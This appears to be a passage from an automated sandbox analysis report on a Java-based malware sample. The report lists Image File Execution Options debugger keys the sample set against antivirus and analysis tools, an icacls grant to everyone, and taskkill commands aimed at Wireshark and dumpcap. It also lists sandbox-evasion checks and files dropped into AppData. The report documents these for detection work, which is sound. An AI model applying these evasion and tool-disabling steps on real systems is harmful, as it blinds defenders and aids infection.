Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\editcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\editcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3SP.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3SP.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuard.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuard.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardBhvScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardBhvScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CisTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CisTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fssm32.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fssm32.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FProtTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FProtTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\coreFrameworkHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\coreFrameworkHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\twssrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\twssrv.exe debugger
Changes image file execution options
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\editcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3SP.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuard.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardBhvScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CisTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fssm32.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FProtTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\coreFrameworkHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\twssrv.exe debugger
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: javaw.exe, 00000006.00000002.2840070588.0000000005000000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM WIRESHARK.EXE /T /F
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: javaw.exe, 00000006.00000002.2840070588.0000000005000000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM WIRESHARK.EXE /T /F
Source: javaw.exe, 00000006.00000002.2852164498.0000000016240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F/^
Source: javaw.exe, 00000006.00000002.2840070588.0000000005044000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000006.00000002.2840070588.0000000005044000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
